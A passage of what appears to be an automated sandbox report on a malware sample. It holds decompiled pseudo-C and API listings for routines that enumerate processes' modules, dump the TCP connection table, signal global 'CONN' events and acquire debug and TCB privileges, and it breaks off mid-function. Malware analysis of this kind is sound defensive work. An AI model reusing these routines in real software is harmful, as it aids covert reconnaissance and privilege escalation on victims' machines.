                                                            0x0464b9a3
                                                            0x0464b9b1
                                                            0x0464b9b7
                                                            0x0464b9bb
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b9c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b9c4
                                                            0x0464ba02
                                                            0x0464ba04
                                                            0x00000000
                                                            0x00000000
                                                            0x0464ba06
                                                            0x0464ba08
                                                            0x00000000
                                                            0x00000000
                                                            0x0464ba0a
                                                            0x0464ba0f
                                                            0x0464ba17
                                                            0x0464ba19
                                                            0x0464ba1d
                                                            0x0464ba22
                                                            0x0464ba25
                                                            0x0464ba27
                                                            0x0464ba2c
                                                            0x0464ba2c
                                                            0x0464ba34
                                                            0x0464ba38
                                                            0x0464ba3d
                                                            0x0464ba4b
                                                            0x0464ba4d
                                                            0x0464ba4e
                                                            0x0464ba60
                                                            0x0464ba6f
                                                            0x0464ba75
                                                            0x0464ba79
                                                            0x0464ba7d
                                                            0x0464ba80
                                                            0x0464ba92
                                                            0x0464ba92
                                                            0x0464ba95
                                                            0x0464bac1
                                                            0x0464bac1
                                                            0x0464bac7
                                                            0x0464bacb
                                                            0x0464bad3
                                                            0x0464bad5
                                                            0x0464bb1c
                                                            0x0464bb1c
                                                            0x0464bb22
                                                            0x0464bb24
                                                            0x0464bb26
                                                            0x0464bb29
                                                            0x0464bb2d
                                                            0x0464bb30
                                                            0x0464bb34
                                                            0x0464bb39
                                                            0x0464bb39
                                                            0x0464bb2d
                                                            0x0464bb43
                                                            0x0464bb47
                                                            0x0464bb49
                                                            0x00000000
                                                            0x0464bb4f
                                                            0x0464bb4f
                                                            0x0464bb52
                                                            0x0464bb59
                                                            0x0464bb5b
                                                            0x0464bb67
                                                            0x0464bb69
                                                            0x0464bb6c
                                                            0x0464bb73
                                                            0x0464bb77
                                                            0x0464bb7d
                                                            0x0464bb81
                                                            0x0464bb83
                                                            0x0464bb86
                                                            0x0464bb86
                                                            0x0464bb99
                                                            0x0464bba5
                                                            0x0464bbaf
                                                            0x0464bbaf
                                                            0x0464bb5d
                                                            0x0464bb60
                                                            0x0464bb62
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bb64
                                                            0x0464bb64
                                                            0x00000000
                                                            0x0464bb64
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bad7
                                                            0x0464bad7
                                                            0x0464badc
                                                            0x0464baea
                                                            0x0464baf0
                                                            0x0464baf2
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baf8
                                                            0x0464baf9
                                                            0x0464bafd
                                                            0x0464bb01
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bb03
                                                            0x0464bb06
                                                            0x0464bb16
                                                            0x00000000
                                                            0x0464bb16
                                                            0x0464ba97
                                                            0x0464ba9a
                                                            0x0464ba9c
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baa4
                                                            0x0464baa7
                                                            0x0464baa9
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baab
                                                            0x0464baaf
                                                            0x0464baaf
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baaf
                                                            0x0464ba82
                                                            0x0464ba85
                                                            0x0464ba87
                                                            0x00000000
                                                            0x00000000
                                                            0x0464ba8e
                                                            0x00000000
                                                            0x0464bab1
                                                            0x0464bab6
                                                            0x0464bab8
                                                            0x0464bab8
                                                            0x00000000
                                                            0x0464babf
                                                            0x0464b9ca
                                                            0x0464b9ca
                                                            0x0464b9cb
                                                            0x0464b9cf
                                                            0x0464b7f0
                                                            0x0464b9e4
                                                            0x0464b9e6
                                                            0x0464b9ea
                                                            0x00000000
                                                            0x0464b734
                                                            0x0464b9f2
                                                            0x0464b9f7
                                                            0x00000000
                                                            0x0464b9f7

                                                            APIs
                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                              • Part of subcall function 04649390: wsprintfW.USER32 ref: 046493CE
                                                              • Part of subcall function 04649390: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 046493E0
                                                              • Part of subcall function 04649390: GetLastError.KERNEL32 ref: 046493F1
                                                              • Part of subcall function 04649390: CloseHandle.KERNEL32(?), ref: 04649401
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0464B64E
                                                            • GetTickCount.KERNEL32 ref: 0464B65A
                                                            • GetTickCount.KERNEL32 ref: 0464B65D
                                                            • wsprintfA.USER32 ref: 0464B66D
                                                            • CreateThread.KERNEL32(00000000,00000000,0464C0A0,00000000,00000000,00000000), ref: 0464B695
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464B698
                                                            • CreateThread.KERNEL32(00000000,00000000,0463E6E0,00000000,00000000,00000000), ref: 0464B6B2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464B6B5
                                                            • GetTickCount.KERNEL32 ref: 0464B88F
                                                            • GetTickCount.KERNEL32 ref: 0464B8B9
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0464B8FA
                                                            • lstrcpy.KERNEL32(0000000C,?), ref: 0464B91C
                                                            • lstrcpyW.KERNEL32(046878D8,?), ref: 0464B92F
                                                            • Sleep.KERNEL32(000003E8), ref: 0464B9B1
                                                            • Sleep.KERNEL32(00002710,Control), ref: 0464B9F7
                                                            • OpenEventA.KERNEL32(001F0003,00000000,?,?,00000005,0000003F), ref: 0464BA6F
                                                            • Sleep.KERNEL32(000001F4), ref: 0464BAB6
                                                            • Sleep.KERNEL32(000003E8), ref: 0464BADC
                                                            • OpenEventA.KERNEL32(001F0003,00000001,Global\CONN0000000000), ref: 0464BAEA
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464BB06
                                                            • lstrcpyW.KERNEL32(046864A4,[CONN]), ref: 0464BB16
                                                            • CloseHandle.KERNEL32(?), ref: 0464BB73
                                                            • SetErrorMode.KERNEL32(00000000), ref: 0464BB77
                                                            • CloseHandle.KERNEL32(?), ref: 0464BB86
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464BB93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CountCreateEventSleepTick$Errorlstrcpy$ModeOpenThreadwsprintf$AllocateCheckFreeInitializeLastMembershipToken
                                                            • String ID: 20220829$Control$Global\%d%d$Global\CONN0000000000$[CONN]$v20220829
                                                            • API String ID: 2334699370-1326833230
                                                            • Opcode ID: bf80ece8eb9517b39f2ee57bb9ec394987155a909f4fe798a3c0a05089efc98a
                                                            • Instruction ID: e15640131d77b163d22ea496acbe57ced7299e60911dcef6d66430c0c2d8e49d
                                                            • Opcode Fuzzy Hash: bf80ece8eb9517b39f2ee57bb9ec394987155a909f4fe798a3c0a05089efc98a
                                                            • Instruction Fuzzy Hash: 3BF18E70604341AFEB24DF64D888B6AB7E4FF94B09F04052DE9499B280FB75F944CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E04644850(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                            				void* _v8;
                                                            				long _v12;
                                                            				WCHAR* _v16;
                                                            				WCHAR* _v20;
                                                            				WCHAR* _v24;
                                                            				WCHAR* _v28;
                                                            				struct tagPROCESSENTRY32W _v32;
                                                            				void* _v36;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				WCHAR* _t105;
                                                            				WCHAR* _t106;
                                                            				WCHAR* _t107;
                                                            				WCHAR* _t108;
                                                            				struct tagPROCESSENTRY32W _t110;
                                                            				int _t126;
                                                            				int _t127;
                                                            				int _t128;
                                                            				int _t129;
                                                            				int _t130;
                                                            				signed short* _t178;
                                                            				signed int _t179;
                                                            				signed int _t185;
                                                            				WCHAR* _t186;
                                                            				void* _t187;
                                                            				void* _t188;
                                                            				WCHAR* _t189;
                                                            				void* _t192;
                                                            				signed int _t195;
                                                            				WCHAR* _t196;
                                                            				WCHAR* _t197;
                                                            				intOrPtr* _t198;
                                                            				struct tagPROCESSENTRY32W _t201;
                                                            				void* _t203;
                                                            				void* _t205;
                                                            				void* _t207;
                                                            				struct tagPROCESSENTRY32W _t208;
                                                            				WCHAR* _t209;
                                                            				void* _t210;
                                                            				long _t218;
                                                            				long _t219;
                                                            				void* _t222;
                                                            				void* _t224;
                                                            				void* _t226;
                                                            				void* _t228;
                                                            				void* _t230;
                                                            				void* _t231;
                                                            				void* _t233;
                                                            				void* _t239;
                                                            
                                                            				_t239 = __eflags;
                                                            				_t187 = __ecx;
                                                            				_t210 = LocalAlloc(0x40, 0x400);
                                                            				_v12 = 1;
                                                            				_push(0x208);
                                                            				_v8 = _t210;
                                                            				 *_t210 = 0x81;
                                                            				_t105 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x208);
                                                            				_t186 = _t105;
                                                            				_t106 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x208);
                                                            				_v16 = _t106;
                                                            				_t107 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x208);
                                                            				_v20 = _t107;
                                                            				_t108 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x28);
                                                            				_v24 = _t108;
                                                            				_v28 = L04655B55(_t187, _t210, _t239);
                                                            				_t110 = L04655B14(_t210, _t239, 0x428);
                                                            				_t231 = _t230 + 0x18;
                                                            				_t208 = _t110;
                                                            				_v32 = _t208;
                                                            				 *_t208 = 0x428;
                                                            				_t188 = CreateToolhelp32Snapshot(0x18, _a4);
                                                            				_v36 = _t188;
                                                            				if(_t188 != 0xffffffff) {
                                                            					if(Module32FirstW(_t188, _t208) != 0) {
                                                            						_t10 = _t208 + 0x20; // 0x20
                                                            						_t209 = _t208 + 0x220;
                                                            						_a4 = _t10;
                                                            						do {
                                                            							if( *_t209 != 0x3f005c || _t209[2] != 0x5c003f) {
                                                            								_t189 = _t209;
                                                            								_t198 = L"\\SystemRoot";
                                                            								_t210 = 0x12;
                                                            								while(1) {
                                                            									__eflags =  *_t189 -  *_t198;
                                                            									if( *_t189 !=  *_t198) {
                                                            										goto L16;
                                                            									}
                                                            									_t189 =  &(_t189[2]);
                                                            									_t198 = _t198 + 4;
                                                            									_t210 = _t210 - 4;
                                                            									__eflags = _t210;
                                                            									if(_t210 >= 0) {
                                                            										continue;
                                                            									} else {
                                                            										__eflags =  *_t189 -  *_t198;
                                                            										if( *_t189 ==  *_t198) {
                                                            											wsprintfW(_t186, L"C:\\WINDOWS%s", _v32 + 0x24c);
                                                            											_t231 = _t231 + 0xc;
                                                            											_t197 = _t186;
                                                            											_t207 = _t209 - _t186;
                                                            											asm("o16 nop [eax+eax]");
                                                            											do {
                                                            												_t185 =  *_t197 & 0x0000ffff;
                                                            												_t197 =  &(_t197[1]);
                                                            												 *(_t207 + _t197 - 2) = _t185;
                                                            												__eflags = _t185;
                                                            											} while (_t185 != 0);
                                                            										}
                                                            									}
                                                            									goto L16;
                                                            								}
                                                            							} else {
                                                            								_t178 = _v32 + 0x230;
                                                            								_t203 = _t186 - _t178;
                                                            								do {
                                                            									_t195 =  *_t178 & 0x0000ffff;
                                                            									_t178 =  &(_t178[1]);
                                                            									 *(_t203 + _t178 - 2) = _t195;
                                                            								} while (_t195 != 0);
                                                            								_t196 = _t186;
                                                            								_t205 = _t209 - _t186;
                                                            								asm("o16 nop [eax+eax]");
                                                            								do {
                                                            									_t179 =  *_t196 & 0x0000ffff;
                                                            									_t196 =  &(_t196[1]);
                                                            									 *(_t205 + _t196 - 2) = _t179;
                                                            								} while (_t179 != 0);
                                                            							}
                                                            							L16:
                                                            							E04645DD0(_t186, _t209, _v16, _t209, _t210, _v20, _v24);
                                                            							asm("xorps xmm0, xmm0");
                                                            							_t233 = _t231 + 8;
                                                            							asm("movups [eax], xmm0");
                                                            							asm("movups [eax+0x10], xmm0");
                                                            							asm("movq [eax+0x20], xmm0");
                                                            							E04644790(_t209, _v28, _t210);
                                                            							_t126 = lstrlenW(_t209);
                                                            							_t127 = lstrlenW(_v28);
                                                            							_t128 = lstrlenW(_v24);
                                                            							_t129 = lstrlenW(_v20);
                                                            							_t130 = lstrlenW(_v16);
                                                            							_t218 = _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _v12 + 0x14;
                                                            							if(LocalSize(_v8) >= _t218) {
                                                            								_t192 = _v8;
                                                            							} else {
                                                            								_t192 = LocalReAlloc(_v8, _t218, 0x42);
                                                            								_v8 = _t192;
                                                            							}
                                                            							_t201 = _v32;
                                                            							_t219 = _v12;
                                                            							 *((intOrPtr*)(_t219 + _t192)) =  *((intOrPtr*)(_t201 + 0x14));
                                                            							 *((intOrPtr*)(_t219 + _t192 + 4)) =  *((intOrPtr*)(_t201 + 0x18));
                                                            							_v12 = _t219 + 8;
                                                            							E0465E060(_v8 + _v12, _a4, 2 + lstrlenW(_t201 + 0x20) * 2);
                                                            							_t222 = _v12 + 2 + lstrlenW(_a4) * 2;
                                                            							E0465E060(_v8 + _t222, _t209, 2 + lstrlenW(_t209) * 2);
                                                            							_t224 = _t222 + lstrlenW(_t209) * 2 + 2;
                                                            							E0465E060(_v8 + _t224, _v16, 2 + lstrlenW(_v16) * 2);
                                                            							_t226 = _t224 + lstrlenW(_v16) * 2 + 2;
                                                            							E0465E060(_v8 + _t226, _v20, 2 + lstrlenW(_v20) * 2);
                                                            							_t228 = _t226 + lstrlenW(_v20) * 2 + 2;
                                                            							E0465E060(_v8 + _t228, _v24, 2 + lstrlenW(_v24) * 2);
                                                            							_t210 = _t228 + lstrlenW(_v24) * 2 + 2;
                                                            							E0465E060(_v8 + _t210, _v28, 2 + lstrlenW(_v28) * 2);
                                                            							_t231 = _t233 + 0x48;
                                                            							_v12 = _t210 + (lstrlenW(_v28) + 1) * 2;
                                                            						} while (Module32NextW(_v36, _v32) != 0);
                                                            						_t210 = _v8;
                                                            						_t208 = _v32;
                                                            					}
                                                            					CloseHandle(_v36);
                                                            				}
                                                            				L04655B0F(_t186);
                                                            				L04655B0F(_v16);
                                                            				L04655B0F(_v20);
                                                            				L04655B0F(_v24);
                                                            				L04655B0F(_v28);
                                                            				_push(0x428);
                                                            				E04655B47(_t208);
                                                            				return LocalReAlloc(_t210, _v12, 0x42);
                                                            			}

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,00000400), ref: 04644860
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000018,00000001), ref: 046448CF
                                                            • Module32FirstW.KERNEL32(00000000,00000000), ref: 046448E5
                                                            • wsprintfW.USER32 ref: 04644988
                                                            • lstrlenW.KERNEL32(-00000220), ref: 046449DF
                                                            • lstrlenW.KERNEL32(?), ref: 046449EA
                                                            • lstrlenW.KERNEL32(?), ref: 046449F5
                                                            • lstrlenW.KERNEL32(?), ref: 04644A00
                                                            • lstrlenW.KERNEL32(?), ref: 04644A0B
                                                            • lstrlenW.KERNEL32(00000001), ref: 04644A16
                                                            • LocalSize.KERNEL32(?), ref: 04644A2B
                                                            • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 04644A3B
                                                            • lstrlenW.KERNEL32(?), ref: 04644A6E
                                                            • lstrlenW.KERNEL32(00000001), ref: 04644A8D
                                                            • lstrlenW.KERNEL32(-00000220), ref: 04644A99
                                                            • lstrlenW.KERNEL32(-00000220), ref: 04644AB7
                                                            • lstrlenW.KERNEL32(?), ref: 04644AC6
                                                            • lstrlenW.KERNEL32(?), ref: 04644AE8
                                                            • lstrlenW.KERNEL32(?), ref: 04644AF7
                                                            • lstrlenW.KERNEL32(?), ref: 04644B19
                                                            • lstrlenW.KERNEL32(?), ref: 04644B28
                                                            • lstrlenW.KERNEL32(?), ref: 04644B4A
                                                            • lstrlenW.KERNEL32(?), ref: 04644B59
                                                            • lstrlenW.KERNEL32(?), ref: 04644B7B
                                                            • Module32NextW.KERNEL32(?,?), ref: 04644B8E
                                                            • CloseHandle.KERNEL32(?), ref: 04644BA5
                                                            • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 04644BE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Local$Alloc$Module32$CloseCreateFirstHandleNextSizeSnapshotToolhelp32wsprintf
                                                            • String ID: C:\WINDOWS%s$\SystemRoot
                                                            • API String ID: 671652143-1245600093
                                                            • Opcode ID: 0e79597fc0d946513ddffcd1b7d61ff1eed54283d52fcf8801f54d036b1b648e
                                                            • Instruction ID: 8e0a6cf722af530380af94f20d1ee5d3be459182fee45873e46952f30dd025aa
                                                            • Opcode Fuzzy Hash: 0e79597fc0d946513ddffcd1b7d61ff1eed54283d52fcf8801f54d036b1b648e
                                                            • Instruction Fuzzy Hash: 2CB18F71E00119EBCF109FA8EC4DAAEBBB5FF44315F044068F905A7261FB36AA11DB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E0463D570(void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v16;
                                                            				short _v540;
                                                            				void* _v544;
                                                            				void* _v548;
                                                            				void* _v552;
                                                            				long _v556;
                                                            				signed int* _v560;
                                                            				intOrPtr _v576;
                                                            				intOrPtr _v580;
                                                            				intOrPtr _v584;
                                                            				intOrPtr _v588;
                                                            				_Unknown_base(*)() _v592;
                                                            				intOrPtr _v596;
                                                            				intOrPtr _v600;
                                                            				void* _v604;
                                                            				signed int _t97;
                                                            				_Unknown_base(*)()* _t102;
                                                            				signed int _t108;
                                                            				void* _t109;
                                                            				void* _t111;
                                                            				int _t125;
                                                            				signed int _t133;
                                                            				void* _t135;
                                                            				void* _t137;
                                                            				void* _t143;
                                                            				signed int* _t144;
                                                            				signed int* _t148;
                                                            				int _t161;
                                                            				signed int _t169;
                                                            				signed int* _t178;
                                                            				intOrPtr _t179;
                                                            				long _t180;
                                                            				_Unknown_base(*)()* _t184;
                                                            				intOrPtr _t185;
                                                            				long _t186;
                                                            				intOrPtr _t188;
                                                            				intOrPtr _t193;
                                                            				struct HINSTANCE__* _t195;
                                                            				signed int _t197;
                                                            				void* _t199;
                                                            				signed int* _t201;
                                                            				void* _t202;
                                                            				long _t204;
                                                            				void* _t208;
                                                            				void* _t211;
                                                            				signed int _t215;
                                                            				void* _t219;
                                                            				signed int _t222;
                                                            				void* _t223;
                                                            				void* _t228;
                                                            				void* _t231;
                                                            				void* _t233;
                                                            
                                                            				_t222 = (_t219 - 0x00000008 & 0xfffffff0) + 4;
                                                            				_v8 =  *((intOrPtr*)(_t219 + 4));
                                                            				_t215 = _t222;
                                                            				_t223 = _t222 - 0x258;
                                                            				_t97 =  *0x4684008; // 0xd355be4e
                                                            				_v16 = _t97 ^ _t215;
                                                            				_push(__esi);
                                                            				_t204 = 0;
                                                            				_t195 = LoadLibraryA("iphlpapi.dll");
                                                            				if(_t195 == 0) {
                                                            					L5:
                                                            					return E04655AFE(_v16 ^ _t215);
                                                            				} else {
                                                            					_v604 = 0;
                                                            					_v600 = 1;
                                                            					_t102 = GetProcAddress(_t195, "GetExtendedTcpTable");
                                                            					_v548 = _t102;
                                                            					if(_t102 == 0) {
                                                            						_t197 = GetProcAddress(_t195, "AllocateAndGetTcpExTableFromStack");
                                                            						__eflags = _t197;
                                                            						if(_t197 == 0) {
                                                            							__eflags = 0;
                                                            							goto L24;
                                                            						} else {
                                                            							_v544 = 0;
                                                            							_t108 =  *_t197( &_v544, 1, GetProcessHeap(), 0, 2);
                                                            							__eflags = _t108;
                                                            							if(_t108 == 0) {
                                                            								_t109 = LocalAlloc(0x40, 0x2800);
                                                            								_t178 = _v544;
                                                            								_t199 = _t109;
                                                            								_v548 = 0;
                                                            								__eflags =  *_t178;
                                                            								if( *_t178 > 0) {
                                                            									_t188 = 0;
                                                            									_v552 = 0;
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_v596 =  *((intOrPtr*)(_t188 +  &(_t178[2])));
                                                            										_v592 =  *((intOrPtr*)(_t188 +  &(_t178[3])));
                                                            										_v588 =  *((intOrPtr*)(_t188 +  &(_t178[4])));
                                                            										_v584 =  *((intOrPtr*)(_t188 +  &(_t178[5])));
                                                            										_t179 =  *((intOrPtr*)(_t188 +  &(_t178[6])));
                                                            										_push(_t179);
                                                            										_v580 =  *((intOrPtr*)(_t188 +  &(_t178[1])));
                                                            										_v576 = _t179;
                                                            										E0463D4D0(_t179,  &_v540);
                                                            										_t228 = _t223 + 4;
                                                            										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                            										_t125 = LocalSize(_t199);
                                                            										_t180 = _v556;
                                                            										__eflags = _t125 - _t180;
                                                            										if(_t125 < _t180) {
                                                            											_t199 = LocalReAlloc(_t199, _t180, 0x42);
                                                            										}
                                                            										asm("movups xmm0, [ebp-0x250]");
                                                            										asm("movups [esi+edi], xmm0");
                                                            										asm("movups xmm0, [ebp-0x240]");
                                                            										asm("movups [esi+edi+0x10], xmm0");
                                                            										_t208 = _t204 + 0x20;
                                                            										E0465E060(_t208 + _t199,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                            										_t223 = _t228 + 0xc;
                                                            										_t133 = lstrlenW( &_v540);
                                                            										_t178 = _v544;
                                                            										_t188 = _v552 + 0x18;
                                                            										_v552 = _t188;
                                                            										_t204 = _t208 + _t133 * 2 + 2;
                                                            										_t135 = _v548 + 1;
                                                            										_v548 = _t135;
                                                            										__eflags = _t135 -  *_t178;
                                                            									} while (_t135 <  *_t178);
                                                            								}
                                                            								LocalReAlloc(_t199, _t204, 0x42);
                                                            								_t111 = _v544;
                                                            								__eflags = _t111;
                                                            								if(_t111 != 0) {
                                                            									HeapFree(GetProcessHeap(), 0, _t111);
                                                            								}
                                                            								goto L24;
                                                            							} else {
                                                            								_t137 = _v544;
                                                            								__eflags = _t137;
                                                            								if(_t137 == 0) {
                                                            									goto L5;
                                                            								} else {
                                                            									HeapFree(GetProcessHeap(), 0, _t137);
                                                            									__eflags = _v16 ^ _t215;
                                                            									return E04655AFE(_v16 ^ _t215);
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_v544 = 0;
                                                            						_t143 =  *_t102(0,  &_v544, 1, 2, 5, 0);
                                                            						_t237 = _t143 - 0x7a;
                                                            						if(_t143 != 0x7a) {
                                                            							goto L5;
                                                            						} else {
                                                            							_push(_v544);
                                                            							_t144 = L04655B55( &_v544, 0, _t237);
                                                            							_t231 = _t223 + 4;
                                                            							_t201 = _t144;
                                                            							_v560 = _t201;
                                                            							_push(0);
                                                            							_push(5);
                                                            							_push(2);
                                                            							_push(1);
                                                            							_push( &_v544);
                                                            							_push(_t201);
                                                            							if(_v548() == 0) {
                                                            								_t202 = LocalAlloc(0x40, 0x2800);
                                                            								_v552 = 0;
                                                            								_t148 = _v560;
                                                            								__eflags =  *_t148;
                                                            								if( *_t148 > 0) {
                                                            									_t184 =  &(_t148[3]);
                                                            									_v548 = _t184;
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_v596 =  *((intOrPtr*)(_t184 - 4));
                                                            										_v592 =  *_t184;
                                                            										_v588 =  *((intOrPtr*)(_t184 + 4));
                                                            										_v584 =  *((intOrPtr*)(_t184 + 8));
                                                            										_t185 =  *((intOrPtr*)(_t184 + 0xc));
                                                            										_push(_t185);
                                                            										_v580 =  *((intOrPtr*)(_t184 - 8));
                                                            										_v576 = _t185;
                                                            										E0463D4D0(_t185,  &_v540);
                                                            										_t233 = _t231 + 4;
                                                            										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                            										_t161 = LocalSize(_t202);
                                                            										_t186 = _v556;
                                                            										__eflags = _t161 - _t186;
                                                            										if(_t161 < _t186) {
                                                            											_t202 = LocalReAlloc(_t202, _t186, 0x42);
                                                            										}
                                                            										asm("movups xmm0, [ebp-0x250]");
                                                            										asm("movups [esi+edi], xmm0");
                                                            										asm("movups xmm0, [ebp-0x240]");
                                                            										asm("movups [esi+edi+0x10], xmm0");
                                                            										_t211 = _t204 + 0x20;
                                                            										E0465E060(_t211 + _t202,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                            										_t231 = _t233 + 0xc;
                                                            										_t169 = lstrlenW( &_v540);
                                                            										_t193 = _v552 + 1;
                                                            										_t184 = _v548 + 0x18;
                                                            										_v552 = _t193;
                                                            										_v548 = _t184;
                                                            										_t204 = _t211 + _t169 * 2 + 2;
                                                            										__eflags = _t193 -  *_v560;
                                                            									} while (_t193 <  *_v560);
                                                            								}
                                                            								_v556 = LocalReAlloc(_t202, _t204, 0x42);
                                                            								L04655B0F(_v560);
                                                            								L24:
                                                            								__eflags = _v16 ^ _t215;
                                                            								return E04655AFE(_v16 ^ _t215);
                                                            							} else {
                                                            								L04655B0F(_t201);
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D59F
                                                            • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 0463D5C1
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 0463D645
                                                            • lstrlenW.KERNEL32(?), ref: 0463D6BB
                                                            • LocalSize.KERNEL32(00000000), ref: 0463D6D1
                                                            • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0463D6E5
                                                            • lstrlenW.KERNEL32(?), ref: 0463D70E
                                                            • lstrlenW.KERNEL32(?), ref: 0463D736
                                                            • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0463D770
                                                            • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 0463D79B
                                                            • GetProcessHeap.KERNEL32(00000000,00000002), ref: 0463D7B5
                                                            • HeapFree.KERNEL32(00000000), ref: 0463D7E4
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 0463D806
                                                            • lstrlenW.KERNEL32(?), ref: 0463D882
                                                            • LocalSize.KERNEL32(00000000), ref: 0463D898
                                                            • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0463D8AC
                                                            • lstrlenW.KERNEL32(?), ref: 0463D8D5
                                                            • lstrlenW.KERNEL32(?), ref: 0463D8FD
                                                            • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0463D937
                                                            • HeapFree.KERNEL32(00000000), ref: 0463D954
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloclstrlen$Heap$AddressFreeProcSize$LibraryLoadProcess
                                                            • String ID: AllocateAndGetTcpExTableFromStack$GetExtendedTcpTable$iphlpapi.dll
                                                            • API String ID: 1916288693-4277049092
                                                            • Opcode ID: 1094672d22b384c443d6a59ad21af2ae1d528ae63bd694e67df73bf8659f0971
                                                            • Instruction ID: aee34478e39811870cae653359e5320498392256df0cc7382cfd8b53612677d2
                                                            • Opcode Fuzzy Hash: 1094672d22b384c443d6a59ad21af2ae1d528ae63bd694e67df73bf8659f0971
                                                            • Instruction Fuzzy Hash: DEC16D71A402199BDB20DF68DC8DBA9B7B4FB58305F040199E90DE7251FB35AE81CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04649E60(void* __eflags) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				char _v24;
                                                            				long _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t19;
                                                            				void* _t22;
                                                            				long _t25;
                                                            				void* _t26;
                                                            				long _t31;
                                                            				int _t41;
                                                            				long _t42;
                                                            				void* _t48;
                                                            				void* _t52;
                                                            				intOrPtr* _t53;
                                                            				void* _t74;
                                                            				void* _t78;
                                                            				void* _t80;
                                                            				void* _t82;
                                                            				signed int _t86;
                                                            				void* _t88;
                                                            
                                                            				_t88 = (_t86 & 0xfffffff8) - 0x14;
                                                            				_push(_t80);
                                                            				_t74 = E0464ADD0(L"SeTcbPrivilege", _t80);
                                                            				_t81 = E0464ADD0(L"SeDebugPrivilege", _t80);
                                                            				_t52 = E0464AC90(L"SeIncreaseQuotaPrivilege", _t74, _t81);
                                                            				_t19 = E0464AC90(L"SeAssignPrimaryTokenPrivilege", _t74, _t81);
                                                            				_t20 = Sleep;
                                                            				if(_t19 == 0) {
                                                            					Sleep(0x1388);
                                                            					_t20 = Sleep;
                                                            				}
